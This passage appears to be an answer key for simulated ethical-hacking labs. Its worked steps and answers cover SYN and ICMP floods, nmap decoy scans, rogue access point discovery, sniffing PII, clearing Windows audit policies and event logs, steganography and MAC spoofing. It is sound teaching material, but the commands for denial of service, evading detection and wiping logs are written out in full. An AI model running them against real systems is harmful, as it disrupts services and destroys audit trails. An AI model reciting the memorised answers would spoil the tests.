• Use Zenmap to find the FTP port on CorpServer (192.168.0.10). • Use Metasploit to send a SYN flood attack as follows: o Remote host: 192.168.0.10 o Source host: 192.168.0.33 o Set the FTP port to match the FTP port used by CorpServer. • Use Wireshark to capture the SYN flood on the enp2s0 network interface. • Filter to show only TCP SYN packets. • Find the MAC address of the computer causing the SYN flood. • Answer the questions. Your Performance Your Score: 5 of 5 (100%) Pass Status: Pass Elapsed Time: 4 minutes 2 seconds Required Score: 100% Task Summary Required Actions & Questions Use Zenmap/nmap to scan ports Started syn flood using Metasploit Filtered for SYN attach using Wireshark Q1 What is the source IP address of the SYN flood attack? Q2 Which of the following MAC addresses is initiating the SYN flood attack? Explanation In this lab, your task is to perform and monitor a SYN flood attack using the following information: • Use Zenmap to find the FTP port on CorpServer (192.168.0.10). • Use Metasploit to send a SYN flood attack as follows: o Remote host: 192.168.0.10 o Source host: 192.168.0.33 o Set the FTP port to match the FTP port used by CorpServer. • Use Wireshark to capture the SYN flood on the enp2s0 network interface. • Filter to show only TCP SYN packets. • Find the MAC address of the computer causing the SYN flood. • Answer the questions.

Complete this lab as follows: 1. From Zenmap, use nmap to find the FTP port used on CorpServer as follows: a. From the Favorites bar, open Zenmap. b. In the Command field, type nmap -p 0-100 192.168.0.10 c. Select Scan . CorpServer is using port 21 for FTP. d. Close Zenmap. 2. Use Metasploit to send a SYN flood as follows: a. From the Favorites bar, open Metasploit Framework. b. At the prompt, type search synflood and press Enter to find a SYN flood Metasploit module. c. Type use auxiliary/dos/tcp/synflood and press Enter to select the SYN flood module. d. Type show options and press Enter to view the current options for the SYN flood module. Notice that RHOST and SHOST are unassigned and RPORT is set to port 80. e. Type set rhost 192.168.0.10 and press Enter to set the RHOST address. f. Type set shost 192.168.0.33 and press Enter to set the SHOST address. g. Type set rport 21 and press Enter to set the FTP port. h. Type show options and press Enter to view the new options for the SYN flood module. Notice that RHOST and SHOST have IP addresses assigned and RPORT is set to port 21 matching CorpServer. 3. Capture SYN flood attacks on the CorpServer machine as follows: a. From the Favorites bar, open Wireshark. b. Under Capture, select enp2s0 . c. In the Apply a display filter field, type host 192.168.0.10 and tcp.flags.syn==1 d. Press Enter . e. Select the blue fin to begin a Wireshark capture. Notice that no packets are being captured. 4. In Metasploit, type exploit and press Enter to start a SYN flood. 5. Capture packets for a few seconds. 6. In Wireshark, select the red box to stop the Wireshark capture. Notice the time between each packet sent to host 192.168.1.10. Notice that only SYN packets were captured. 7. In the top right, select Answer Questions . 8. Answer question 1. 9. In the middle pane, expand Ethernet II . Notice the source MAC address of the computer sending the SYN flood. 10. Answer question 2. 11. Select Score Lab . Lab Questions:

1. What is the source IP address of the SYN flood attack? a. 192.168.0.33 2. Which of the following MAC addresses is initiating the SYN flood attack? a. 00:60:98:7F:41:E0 (IT-Laptop) QUESTION 8: You are the IT administrator for a small corporate network, and you want to know how to find and recognize an ICMP flood attack. You know that you can do this using Wireshark and hping3. In this lab, your task is to create and examine the results of an ICMP flood attack as follows: • From Kali Linux, start a capture in Wireshark for the esp20 interface. • Ping CorpDC at 192.168.0.11. • Examine the ICMP packets captured. • Use hping3 to launch an ICMP flood attack against CorpDC. • Examine the ICMP packets captured. • Answer the questions. Your Performance Your Score: 4 of 4 (100%) Pass Status: Pass Elapsed Time: 5 minutes 9 seconds Required Score: 100% Task Summary Required Actions & Questions Filter for ICMP packets Run ping Run hping3 for ICMP flood

Q1 What is the main difference between a normal icmp (ping) request and an icmp flood? (Select TWO). Explanation In this lab, your task is to create and examine the results of an ICMP flood attack as follows: • From Kali Linux, start a capture in Wireshark for the esp20 interface. • Ping CorpDC at 192.168.0.11. • Examine the ICMP packets captured. • Use hping3 to launch an ICMP flood attack against CorpDC. • Examine the ICMP packets captured. • Answer the questions. Complete this lab as follows: 1. From the Favorites bar, open Wireshark. 2. Under Capture, select enp2s0 . 3. Select the blue fin to begin a Wireshark capture. 4. From the Favorites bar, open Terminal. 5. At the prompt, type ping 192.168.0.11 and press Enter . 6. After some data exchanges, press Ctrl + c to stop the ping process. 7. In Wireshark, select the red box to stop the Wireshark capture. 8. In the Apply a display filter field, type icmp and press Enter . Notice the number of packets captured and the time between each packet being sent. 9. Select the blue fin to begin a new Wireshark capture. 10. In Terminal, type hping3 --icmp --flood 192.168.0.11 and press Enter to start a ping flood against CorpDC. 11. In Wireshark, select the red box to stop the Wireshark capture. Notice the type, number of packets, and the time between each packet being sent. 12. In Terminal, type Ctrl + c to stop the ICMP flood. 13. In the top right, select Answer Questions . 14. Answer the questions. 15. Select Score Lab . Lab Questions: 1. What was the main difference between the normal icmp (ping) request and the icmp flood? (select TWO.) a. With the icmp flood, icmp packets are sent more rapidly. b. With the flood, all packets come from the source.

QUESTION 9: You are an ethical hacker consultant working for CorpNet. They want you to discover weaknesses in their network. From outside of the CorpNet network, you found their web server, www.corpnet.xyz, has an IP address of 198.28.1.1. You decide to perform several nmap scans using a few http scripts. In this lab, your task is to run the following nmap scripts on port 80 of 198.28.1.1: • http-server-header.nse to display the HTTP server header. • http-chrono.nse to measure the time a website takes to deliver a web page. • http-headers.nse to perform a HEAD request for the root folder. • http-errors.nse to crawl through the website and return any error pages. • http-malware-host.nse to look for malware signatures of known server compromises. • http-comments-displayer.nse to display HTML and JavaScript comments. Your Performance Your Score: 9 of 9 (100%) Pass Status: Pass Elapsed Time: 4 minutes 8 seconds Required Score: 100% Task Summary Required Actions & Questions Display the HTTP server header Q1 Which software is used by www.corpnet.com to offer the HTTP service? Measure the time a website takes to deliver a web page Perform a HEAD request for the root folder Crawl through the website and return any error pages

Q2 How many error pages were found? Look for the malware signatures of known server compromises Display HTML and JavaScript comments Q3 What is the last comment listed on line 20 of the web page at http://www.corpnet.xyz:80? Explanation In this lab, your task is to run the following nmap scripts on port 80 of 198.28.1.1: • http-server-header.nse to display the HTTP server header. • http-chrono.nse to measure the time a website takes to deliver a web page. • http-headers.nse to perform a HEAD request for the root folder. • http-errors.nse to crawl through the website and return any error pages. • http-malware-host.nse to look for maleware signatures of known server compromises. • http-comments-displayer.nse to display HTML and JavaScript comments. Complete this lab as follows: 1. From the Favorites bar, open Terminal. 2. At the prompt, type nmap --script=http-server-header -p80 198.28.1.1 and press Enter to run the http-server-header.nse script. 3. In the top right, select Answer Questions . 4. Answer question 1. 5. Type nmap --script=http-chrono -p80 198.28.1.1 and press Enter to run the http- chrono.nse script. 6. Type nmap --script=http-headers -p80 198.28.1.1 and press Enter to run the http- headers.nse script. 7. Type nmap --script=http-errors -p80 198.28.1.1 and press Enter to run the http- errors.nse script. 8. Under Lab Questions , answer question 2. 9. Type nmap --script=http-malware-host -p80 198.28.1.1 and press Enter to run the http-malware-host.nse script. 10. Type nmap --script=http-comments-displayer -p80 198.28.1.1 and press Enter to run the http-comments-displayer.nse script. 11. Under Lab Questions , answer question 3. 12. Click Score Lab . Lab Questions: 1. Which software is used by www.corpnet.xyz to offer the HTTP service? a) Apache 2.4.7. 2. How many error pages were found? a) 0

3. What is the last comment listed on line 20 of the web page at http://www.corpnet.xyz:80 ? a) <!--END Google Analytics Code-- > QUESTION 10: You are a cybersecurity consultant. The company hiring you suspects that employees are connecting to a rogue access point (AP). You need to find the name of the hidden rogue AP so it can be deauthorized. The computer suspected of using the rogue access point is Exec-Laptop. In this lab, your task is to complete the following: • On IT-Laptop, use airmon-ng to put the wireless adapter in monitor mode. • Use airodump-ng to find the hidden access point. • On Exec-Laptop, connect to the rogue AP using the CoffeeShop SSID. • Answer the question. Your Performance Your Score: 3 of 3 (100%) Pass Status: Pass Elapsed Time: 3 minutes 29 seconds Required Score: 100% Task Summary Required Actions & Questions Set the the wlp1s0 wireless adapter to monitor mode Find the hidden access point Q1 What is the BSSID of the rogue access point?

Explanation In this lab, your task is to complete the following: • On IT-Laptop, use airmon-ng to put the wireless adapter in monitor mode. • Use airodump-ng to find the hidden access point. • On Exec-Laptop, connect to the rogue AP using the CoffeeShop SSID. • Answer the question. Complete this lab as follows: 1. On IT-Laptop, configure the wlp1s0 card to run in monitor mode as follows: a. From the Favorites bar, open Terminal. b. At the prompt, type airmon-ng and press Enter to find the name of the wireless adapter. c. Type airmon-ng start wlp1s0 and press Enter to put the adapter in monitor mode. d. Type airmon-ng and press Enter to view the new name of the wireless adapter. 2. Use airodump-ng to discover and isolate the hidden access point as follows: a. Type airodump-ng wlp1s0mon and press Enter to discover all of the access points. b. Press Ctrl + c to stop airodump-ng. c. Find the hidden access point ESSID <length : 0> . d. In the top right, select Answer Questions . e. Answer the question. f. In Terminal, type airodump-ng wlp1s0mon --bssid bssid_number and press Enter to isolate the hidden access point. 3. Switch to the Exec-Laptop and connect to the Wi-Fi network as follows: a. From the top navigation tabs, select Floor 1 Overview . b. Under Executive Office, select Exec-Laptop . c. From the notification area, select the Wi-Fi network icon. d. Select Hidden Network . e. Select Connect . f. In the Enter the name (SSID) for the network field, type CoffeeShop . In a real environment, you'll only need to wait until the employee connects to the rogue access point again. g. Select Next . h. Select Yes . i. Under Lab Questions, select Score Lab .

QUESTION 11: You work for a penetration testing consulting company. You need to make sure that you can't be identified by the intrusion detection systems. Use nmap to perform a decoy scan on CorpNet.local. In this lab, your task is to use nmap to perform a decoy scan on enp2s0 and to use Wireshark to see the results. • Use Wireshark to capture packets on the enp2s0 network interface. • Use nmap to perform a decoy scan targeting the 192.168.0.31 IP address using 10 random IP addresses. Your Performance Your Score: 1 of 1 (100%) Pass Status: Pass Elapsed Time: 1 minute 44 seconds Required Score: 100% Task Summary Required Actions Perform a decoy scan Explanation In this lab, your task is to use nmap to perform a decoy scan on enp2s0 and to use Wireshark to see the results. • Use Wireshark to capture packets on the enp2s0 network interface. • Use nmap to perform a decoy scan targeting the 192.168.0.31 IP address using 10 random IP addresses. Complete this lab as follows: 1. From the Favorites bar, open Wireshark. 2. Under Capture, select enp2s0 . 3. In the upper left menu, select the blue fin to start a scan. 4. From the Favorites bar, open Terminal. 5. At the prompt, type nmap -D RND:10 192.168.0.31 and press Enter .

6. Maximize the window for easier viewing. 7. In Wireshark, scroll down until you see 192.168.0.31 in the Destination column. 8. Under Source, view the different IP addresses used to disguise the scan. QUESTION 12: As the IT security specialist for your company, you're performing a penetration test to verify email security. You are specifically concerned that the HR department may be sending employee's personally identifiable information (PII) in clear text through emails. In this lab, your task is to: • Capture packets on the enp2s0 interface using Wireshark. • Find packets containing the following information using display filters: o Social security numbers (SSN) o Birth dates o Direct deposit routing numbers o Mother's maiden name o Favorite car o Favorite movie “ You can use the tcp contains desired_information filter. ” • Answer the questions. Your Performance Your Score: 4 of 4 (100%) Pass Status: Pass Elapsed Time: 4 minutes 55 seconds Required Score: 100%

Task Summary Lab Questions Q1 What is George Hanks' Social Security number? Q2 What is Steven Joffer's favorite car? Q3 How many packets contain Social Security numbers? Q4 What is the 9-digit bank routing number for Julia? Explanation In this lab, your task is to: • Capture packets on the enp2s0 interface using Wireshark. • Find packets containing the following information using display filters: o Social security numbers (SSN) o Birth dates o Direct deposit routing numbers o Mother's maiden name o Favorite car o Favorite movie • Answer the questions. Complete this lab as follows: 1. From the Favorites bar, open Wireshark. 2. Under Capture, select enp2s0 . 3. Select the blue fin to begin a Wireshark capture. 4. After a few seconds, select the red box to stop the Wireshark capture. 5. In the Apply a display filter field, type tcp contains SSN and press Enter . 6. In the top right, select Answer Questions . 7. In the bottom pane of Wireshark, examine the packet information to answer the questions. 8. Answer the questions. 9. Select Score Lab . Lab Questions: 1. What is George Hank’s Social Security number? a. 111-00-5555 2. What is Steven Joffer’s favorite car? a. Aston Martin 3. How many packets contain Social Security numbers? a. 2 4. What is the 9-digit bank routing number for Julia? a. 999912341

A.2.4 Pro Domain 4: Cover Up QUESTION 1: You are a cybersecurity consultant and have been asked to work with the ACME, Inc. company to ensure their network is protected from hackers. As part of the tests, you need to disable logging on a Windows system. In this lab, your task is to use Windows PowerShell (as Admin) to: • View the current audit policies on the system. • Disable all audit policies. • Confirm that all the audits were disabled. Your Performance Your Score: 1 of 1 (100%) Pass Status: Pass Elapsed Time: 3 minutes 7 seconds Required Score: 100% Task Summary Required Actions Disable all audit policies Explanation In this lab, your task is to use Windows PowerShell (as Admin) to: • View the current audit policies on the system. • Disable all audit policies.

• Confirm that all the audits were disabled. Complete this lab as follows: 1. Right-click Start and select Windows PowerShell (Admin) . 2. Maximize the window for easier viewing. 3. At the command prompt, type auditpol /get /category:* and press Enter to view the current audit policies. Notice the different settings used for each system. 4. Type auditpol /clear /y and press Enter to disable all audit policies. 5. Type auditpol /get /category:* and press Enter to confirm that the audits were disabled. Notice that all of the polices are now set to No Auditing. QUESTION 2: You are a cybersecurity consultant and have been asked to work with the ACME, Inc. company to ensure that their network is protected from hackers. As part of the tests, you need to clear a few log files. In this lab, your task is to use Windows PowerShell (as Admin) to clear the following event logs: • Use get-eventlog to view the available event logs. • Use clear-eventlog to clear the Application and System logs. Your Performance Your Score: 2 of 2 (100%) Pass Status: Pass Elapsed Time: 1 minute 56 seconds Required Score: 100% Task Summary Required Actions Application log cleared System log cleared

Explanation In this lab, your task is to use Windows PowerShell (as Admin) to clear the following event logs: • Use get-eventlog to view the available event logs. • Use clear-eventlog to clear the Application and System logs. Complete this lab as follows: 1. Right-click Start and select Windows PowerShell (Admin) . 2. Maximize the window for easier viewing. 3. At the prompt, type Get-Eventlog -logname * and press Enter . In the Entries column, notice the number of entries for the logs. 4. Type Clear-Eventlog -logname Application and press Enter . 5. Type Clear-Eventlog -logname System and press Enter . 6. Type Get-Eventlog -logname * and press Enter . The log entries for Application is zero. The log entries for System is one because another event occurred between the times you cleared the log and viewed the entry list. QUESTION 3: You are the IT security administrator for a small corporate network. Recently, some of your firm's proprietary data leaked online. You have been asked to use steganography to encrypt data into a file that will be shared with a business partner. The data will allow you to track the source if the information is leaked again. In this lab, your task is to use OpenStego to hide data inside a picture file as follows: • Encrypt the user data found in John.txt into gear.png . • Save the output file into the Documents folder as send.png . • Password protect the file with NoMor3L3@ks! as the password. • Confirm the functionality of the steganography by extracting the data from send.png into the Exports folder and opening the file to view the hidden user data. Your Performance

Your Score: 3 of 3 (100%) Pass Status: Pass Elapsed Time: 3 minutes 21 seconds Required Score: 100% Task Summary Required Actions Encrypt John.txt into send.png and save it in the Documents folder Password protect the file with with the password NoMor3L3@ks! Confirm the functionality of the steganography Hide Details File created File opened Explanation In this lab, your task is to use OpenStego to hide data inside a picture file as follows: • Encrypt the user data found in John.txt into gear.png . • Save the output file into the Documents folder as send.png . • Password protect the file with NoMor3L3@ks! as the password. • Confirm the functionality of the steganography by extracting the data from send.png into the Exports folder and opening the file to view the hidden user data. Complete this lab as follows: 1. Encrypt the user data into the file to be shared as follows: a. In the search field on the taskbar, type OpenStego . b. Under Best match, select OpenStego. c. In the Message File field, select the ellipses at the end of the field. d. Select John.txt . e. Select Open . f. In the Cover File field, select the ellipses at the end of the field. g. Select gear.png file. h. Select Open . i. In the Output Stego File field, select the ellipses at the end of the field. j. In the File name field, enter send.png . k. Select Open . 2. Password protect the file as follows: a. In the Password field, enter NoMor3L3@ks! b. In the Confirm Password field, enter NoMor3L3@ks! c. Select Hide Data . d. Select OK . 3. Extract the data and open the file as follows: a. Under Data Hiding, select Extract Data . b. In the Input Stego File field, select the ellipses . c. Select send.png file with the encryption. d. Select Open .

e. In the Output Folder for Message File field, select the ellipses . f. Double-click Export to set it as the destination of the output the file. g. Click Select Folder . h. In the Password field, enter NoMor3L3@ks! as the password. i. Select Extract Data . j. Select OK . k. From the taskbar, open File Explorer. l. Double-click Documents to navigate to the folder. m. Double-click Export to navigate to the folder. n. Double-click John.txt to open the output file and verify that the decryption process was successful. QUESTION 4: As an IT administrator, you need to know how security breaches are caused. You know that SMAC is used for MAC spoofing, so you are going to spoof your MAC address. In this lab, your task is to complete the following: • On Office2 use ipconfig /all and find the IP address and MAC address. • Spoof the MAC address on ITAdmin to that of Office2 using SMAC. • Refresh your MAC and IP addresses to match the target machine. Your Performance Your Score: 3 of 3 (100%) Pass Status: Pass Elapsed Time: 3 minutes 6 seconds Required Score: 100% Task Summary Required Actions Use ipconfig /all on Office2 to get the IP and MAC addresses

Spoof the MAC address of ITAdmin Update the IP address on ITAdmin Explanation In this lab, your task is to complete the following: • On Office2 use ipconfig /all and find the IP address and MAC address. • Spoof the MAC address on ITAdmin to that of Office2 using SMAC. • Refresh your MAC and IP addresses to match the target machine. Complete this lab as follows: 1. Find the IP address and MAC address as follows: a. Right-click Start and select Windows PowerShell (Admin) . b. At the command prompt, type ipconfig /all and press Enter . c. Find the MAC address and the IP address . 2. Spoof the MAC address as follows: a. From the top navigation tabs, select Floor 1 Overview . b. Under IT Administration, select ITAdmin . c. In the search bar, type SMAC . d. Under Best match, right-click SMAC and select Run as administrator . e. In the New Spoofed Mac Address field, type 00:00:55:55:44:15 for the MAC address from Office2. f. Select Update MAC . g. Select OK to restart the adapter. 3. Refresh your MAC and IP addresses as follows: a. Right-click Start and select Windows PowerShell (Admin) . b. At the command prompt, type ipconfig /all to confirm the MAC address has been updated. c. Type ipconfig /renew to update the IP address.